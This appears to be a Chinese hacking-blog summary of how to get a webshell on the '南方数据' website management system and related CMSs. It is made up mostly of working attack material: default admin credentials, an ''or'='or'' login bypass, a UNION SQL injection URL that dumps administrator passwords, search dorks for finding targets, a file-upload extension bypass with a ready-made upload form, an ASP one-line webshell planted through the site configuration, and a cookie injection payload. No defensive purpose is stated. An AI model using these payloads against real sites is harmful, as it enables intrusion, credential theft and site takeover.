南方数据管理系统拿shell(一个小小的总结)

默认:

admin admin
admin  admin888
'or'='or'
默认数据库Databases/079lidc.mdb

改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp

抓包 明小子上传
 

 

注:通杀南方数据 良精系统 网软天下等

 

http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='

w78cms网站管理系统
关键词   inurl:ShopMore.asp?id
利用页面 /admin/ewebeditor/admin 默认账号密码  admin     198625

关键词:inurl:alogin.asp
木马上传后缀:asp;.asp.jpg
admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp


 

1.通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.target.com/upfile_Other.asp"; method=post
encType=multipart/form-data><INPUT class="tx1" type=file size=30 name=FileName> <INPUT class="tx1" type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer asa或asp文件上传,后面需要加一个空格

 

2.Sql注入
http://www.target.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入
"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp
这里一句话chr(32)密码是"#"

 

3.cookie注入
清空地址栏,利用union语句来注入,提交:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
用刺猬大哥的cookie注入转换工具亦可

 

你可能感兴趣的:(shell)